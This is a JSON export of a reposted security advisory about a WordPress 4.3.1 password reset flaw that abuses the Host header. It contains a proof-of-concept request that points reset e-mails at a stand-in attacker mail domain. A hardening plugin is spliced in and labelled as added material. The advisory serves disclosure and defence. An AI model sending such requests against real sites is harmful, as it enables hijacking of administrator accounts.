{"id":7540,"date":"2017-05-04T14:19:13","date_gmt":"2017-05-04T22:19:13","guid":{"rendered":"http:\/\/www.palada.net\/index.php\/2017\/05\/04\/news-1325\/"},"modified":"2017-05-04T14:19:13","modified_gmt":"2017-05-04T22:19:13","slug":"news-1325","status":"publish","type":"post","link":"http:\/\/www.palada.net\/index.php\/2017\/05\/04\/news-1325\/","title":{"rendered":"SSD Advisory \u2013 WordPress Unauthorized Password Reset"},"content":{"rendered":"<p><strong>Credit to Author: Maor Schwartz | Date: Wed, 03 May 2017 13:09:31 +0000<\/strong><\/p>\n<div class=\"entry-content\">\n<p><strong>Want to get paid for a vulnerability similar to this one?<\/strong><br \/>Contact us at: <a href=\"mailto:ssd@beyondsecurity.com\">ssd@beyondsecurity.com<\/a><\/p>\n<p><strong>Vulnerability Summary<\/strong><br \/> The following advisory describes an Unauthorized Password Reset vulnerability found in WordPress version 4.3.1.<\/p>\n<p>WordPress is web software you can use to create a beautiful website or blog. We like to say that WordPress is both free and priceless at the same time. The core software is built by hundreds of community volunteers, and when you\u2019re ready for more there are thousands of plugins and themes available to transform your site into almost anything you can imagine. 
Over 60 million people have chosen WordPress to power the place on the web they call \u201chome\u201d \u2014 we\u2019d love you to join the family.<\/p>\n<p><strong>Credit<\/strong><br \/> An independent security researcher, Dawid Golunski, has reported this vulnerability to Beyond Security\u2019s SecuriTeam Secure Disclosure program.<\/p>\n<p><strong>Vendor Responses<\/strong><br \/> We notified WordPress about the vulnerabilities back in June 2016; repeated attempts to re-establish contact and get some answers on the status of the patch for this vulnerability went unanswered. At this time there is no solution or workaround for this vulnerability.<\/p>\n<p><strong>Vulnerability Details<\/strong><br \/> WordPress has a password reset feature that contains a vulnerability which might in some cases allow attackers to get hold of the password reset link without previous authentication. Such an attack could lead to an attacker gaining unauthorized access to a victim&#8217;s WordPress account.<\/p>\n<p>The vulnerability stems from WordPress using untrusted data by default when creating a password reset e-mail that is supposed to be delivered only to the e-mail address associated with the account owner.<\/p>\n<p>This can be observed in the following code snippet, which builds the From e-mail header before the PHP mail() function is called:<\/p>\n<pre>----[ wp-includes\/pluggable.php ]----\n\n...\n\nif ( !isset( $from_email ) ) {\n\t\/\/ Get the site domain and get rid of www.\n\t$sitename = strtolower( $_SERVER['SERVER_NAME'] );\n\tif ( substr( $sitename, 0, 4 ) == 'www.' ) {\n\t\t$sitename = substr( $sitename, 4 );\n\t}\n\n\t$from_email = 'wordpress@' . $sitename;\n}\n\n...\n\n------------------------------<\/pre>\n<p>As we can see, WordPress uses the <em>SERVER_NAME<\/em> variable to obtain the hostname of the server and build the <em>From\/Return-Path<\/em> header of the outgoing password reset e-mail.<\/p>\n<p>However, major web servers such as <em>Apache<\/em> fill <em>SERVER_NAME<\/em> from <em>HTTP_HOST<\/em>, i.e. the Host header of the request, by default (Apache does so unless <em>UseCanonicalName<\/em> is set to <em>On<\/em>), and that header is normally supplied by the client in the HTTP request.<\/p>\n<p>Because <em>SERVER_NAME<\/em> can be controlled in this way, an attacker could send a specially crafted request that tricks the password reset script into sending a password reset e-mail to any WordPress user, such as the administrator, with the From\/Return-Path field set to an address on a mail server of the attacker&#8217;s choice, e.g.:<\/p>\n<pre>wordpress@attackers-mxserver.com<\/pre>\n<p>If the local mail server allows relaying of e-mail with arbitrary sender domains when it originates from localhost, the e-mail is sent to the victim WordPress user with such a <em>From\/Return-Path<\/em> header set. The attacker could then get hold of the password reset information in several ways:<\/p>\n<ul>\n<li>The local mail server returns the e-mail to the sender because of some delivery error.<\/li>\n<li>The attacker performs a DoS attack on the victim&#8217;s mailbox (e.g. by sending multiple large files to exceed the user&#8217;s disk quota) so that the password reset e-mail is rejected and bounced to the attacker&#8217;s address.<\/li>\n<li>Some auto-responders attach a copy of the received message to their automatic reply; depending on the implementation they may use the <em>From\/Return-Path<\/em> header as the reply address.<\/li>\n<li>The attacker social-engineers the victim into replying, or sends multiple password reset e-mails to pressure the victim into replying.<\/li>\n<\/ul>\n<p>The attacker could also trigger password resets (with malicious headers set) for other WordPress accounts by brute-forcing user names, hoping to find an account whose associated e-mail address has expired or been deactivated. This is the case, for example, for former employees whose mailbox was deleted when they left the company while the administrator forgot to remove their WordPress accounts. A password reset e-mail sent to such a non-existent mailbox bounces straight back to the attacker.<\/p>\n<p>Which e-mail header the attacker is able to control, From or Return-Path, depends on the hosting environment; under Windows the From header also sets the Return-Path. 
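<\/p>\n<p>The root cause described above is that the sender address is derived from request data. The following is an added hardening example written for this page: it is not WordPress core code and not part of the original advisory. It pins the From address, the envelope sender (which becomes the Return-Path) and the set of Host names under which a password reset is accepted to values chosen by the administrator, so neither header can follow an injected Host header whichever mail transport is in use. The file name, the MAIL_SENDER_DOMAIN and MAIL_SENDER_ADDRESS constants and the example_* functions are assumptions made for this example; wp_mail_from, phpmailer_init and lostpassword_post are real WordPress hooks.<\/p>

```php
<?php
/*
 * Plugin Name: Pin outgoing mail sender
 *
 * Added hardening example for the advisory above; this is not WordPress core
 * code. Install as wp-content/mu-plugins/pin-mail-sender.php so that it loads
 * on every request. MAIL_SENDER_DOMAIN is an assumed value: set it to the
 * domain the site is really served under, whose MX you control.
 */

define( 'MAIL_SENDER_DOMAIN', 'example.com' );                     // assumption
define( 'MAIL_SENDER_ADDRESS', 'wordpress@' . MAIL_SENDER_DOMAIN ); // assumption

/*
 * What the vulnerable path in wp_mail() does: derive the sender from
 * SERVER_NAME, which Apache (UseCanonicalName Off, the default) copies from
 * the client-supplied Host header. Kept only for contrast, never hooked.
 */
function example_untrusted_from_email() {
	$sitename = strtolower( $_SERVER['SERVER_NAME'] );
	if ( substr( $sitename, 0, 4 ) == 'www.' ) {
		$sitename = substr( $sitename, 4 );
	}
	return 'wordpress@' . $sitename; // follows whatever Host: the client sent
}

/* Hardened form: the sender is a constant and never depends on request data. */
function example_pinned_from_email() {
	return MAIL_SENDER_ADDRESS;
}

/* Normalise the Host header to a bare lowercase hostname, port stripped. */
function example_request_host() {
	$raw  = isset( $_SERVER['HTTP_HOST'] ) ? $_SERVER['HTTP_HOST'] : '';
	$host = parse_url( 'http://' . $raw, PHP_URL_HOST );
	return is_string( $host ) ? strtolower( $host ) : '';
}

/* Pin the envelope sender on the PHPMailer instance wp_mail() is about to use.
 * PHPMailer hands Sender to sendmail as -f and to mail() via sendmail_from,
 * and uses it as MAIL FROM over SMTP, so the Return-Path is fixed on every
 * transport the advisory distinguishes. */
function example_pin_envelope_sender( $phpmailer ) {
	$phpmailer->Sender = MAIL_SENDER_ADDRESS;
}

/* Refuse to start a reset when the request names a host this site is not
 * served under. An IP-based vhost answers to any Host header, which is the
 * setup the proof of concept relies on. */
function example_reject_foreign_host() {
	$allowed = array( MAIL_SENDER_DOMAIN, 'www.' . MAIL_SENDER_DOMAIN ); // assumption
	if ( ! in_array( example_request_host(), $allowed, true ) ) {
		wp_die( 'Password reset refused: unexpected Host header.', 'Forbidden',
		        array( 'response' => 403 ) );
	}
}

// 1. wp_mail() applies this filter after its SERVER_NAME fallback, so the
//    From: header of the reset mail no longer follows the Host header.
add_filter( 'wp_mail_from', 'example_pinned_from_email', PHP_INT_MAX );

// 2. Pin the envelope sender (Return-Path) as well.
add_action( 'phpmailer_init', 'example_pin_envelope_sender', PHP_INT_MAX );

// 3. Belt and braces: do not even generate a reset key for a spoofed host.
add_action( 'lostpassword_post', 'example_reject_foreign_host' );
```

<p>On the web server side the same untrusted input can be removed at the source: in Apache, <em>UseCanonicalName On<\/em> together with an explicit <em>ServerName<\/em> makes <em>SERVER_NAME<\/em> a fixed value instead of a copy of the Host header, and a first-listed default virtual host that does not serve WordPress stops the IP-based access used in the proof of concept below. The Host check in the example assumes the site is not behind a proxy that rewrites the Host header; extend the allow-list if it is.<\/p>\n<p>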
Note also that an attacker would be able to set both headers, regardless of the hosting environment, if the e-mail transport has been changed from the PHP <em>mail()<\/em> function to SMTP.<\/p>\n<p><strong>Proof of Concept<\/strong><\/p>\n<p>If an attacker sends a request similar to the one below to a default WordPress installation that is accessible by IP address (IP-based vhost):<\/p>\n<pre>----[ HTTP Request ]----\n\nPOST \/wp\/wordpress\/wp-login.php?action=lostpassword HTTP\/1.1\nHost: injected-attackers-mxserver.com\nReferer: http:\/\/wp-server\/wp\/wordpress\/wp-login.php?action=lostpassword\nContent-Type: application\/x-www-form-urlencoded\nContent-Length: 56\n\nuser_login=admin&amp;redirect_to=&amp;wp-submit=Get+New+Password\n\n------------------------<\/pre>\n<p>WordPress will trigger the password reset function for the admin user account.<\/p>\n<p>Because of the modified <em>Host<\/em> header, <em>SERVER_NAME<\/em> is overwritten with the hostname of the attacker&#8217;s choice. 
As a result, WordPress passes the following headers and e-mail body to the <em>\/usr\/sbin\/sendmail<\/em> wrapper:<\/p>\n<pre>----[ resulting e-mail ]----\n\nTo: victimadmin@admins-mailserver.com\nSubject: [CompanyX WP] Password Reset\nReturn-Path: &lt;wordpress@attackers-mxserver.com&gt;\nFrom: WordPress &lt;wordpress@attackers-mxserver.com&gt;\nMessage-ID: &lt;e6fd614c5dd8a1c604df2a732eb7b016@attackers-mxserver.com&gt;\nX-Priority: 3\nMIME-Version: 1.0\nContent-Type: text\/plain; charset=UTF-8\nContent-Transfer-Encoding: 8bit\n\n\nSomeone requested that the password be reset for the following account:\n\nhttp:\/\/companyX-wp\/wp\/wordpress\/\n\nUsername: admin\n\nIf this was a mistake, just ignore this email and nothing will happen.\n\nTo reset your password, visit the following address:\n\n&lt;http:\/\/companyX-wp\/wp\/wordpress\/wp-login.php?action=rp&amp;key=AceiMFmkMR4fsmwxIZtZ&amp;login=admin&gt;\n\n------------------------------<\/pre>\n<p>This can be quickly verified by replacing <em>\/usr\/sbin\/sendmail<\/em> with a bash script (with the executable bit set via chmod +x):<\/p>\n<div id=\"crayon-590ba8e0a79dd754293484\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> #!\/bin\/bash  cat &gt; 
\/tmp\/outgoing-email<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-590ba8e0a79dd754293484-1\">1<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-590ba8e0a79dd754293484-2\">2<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-590ba8e0a79dd754293484-1\"><span class=\"crayon-p\">#!\/bin\/bash<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-590ba8e0a79dd754293484-2\"><span class=\"crayon-v\">cat<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">tmp<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">outgoing<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">email<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0003 seconds] -->  <\/p>\n<p>As we can see, fields Return-Path, From, and Message-ID, all have the attacker&#8217;s domain set.<\/p>\n<\/p><\/div>\n<p><a href=\"https:\/\/blogs.securiteam.com\/index.php\/archives\/3176\" target=\"bwo\" >https:\/\/blogs.securiteam.com\/index.php\/feed<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p><strong>Credit to Author: Maor Schwartz| Date: Wed, 03 May 2017 13:09:31 +0000<\/strong><\/p>\n<p>Vulnerability Summary The following advisory describe Unauthorized Password Reset vulnerability found in WordPress version 4.3.1. WordPress is web software you can use to create a beautiful website or blog. 
We like to say that WordPress is both free and priceless at the same time. The core software is built by hundreds of community volunteers, and &#8230; <a href=\"https:\/\/blogs.securiteam.com\/index.php\/archives\/3176\" class=\"more-link\">Continue reading <span class=\"screen-reader-text\">SSD Advisory \u2013 WordPress Unauthorized Password Reset<\/span><\/a><\/p>\n","protected":false},"author":4,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"colormag_page_container_layout":"default_layout","colormag_page_sidebar_layout":"default_layout","footnotes":""},"categories":[10643,10754],"tags":[12179,10757],"class_list":["post-7540","post","type-post","status-publish","format-standard","hentry","category-independent","category-securiteam","tag-origin-validation-error","tag-securiteam-secure-disclosure"],"_links":{"self":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/7540","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/users\/4"}],"replies":[{"embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/comments?post=7540"}],"version-history":[{"count":0,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/7540\/revisions"}],"wp:attachment":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/media?parent=7540"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/categories?post=7540"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/tags?post=7540"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}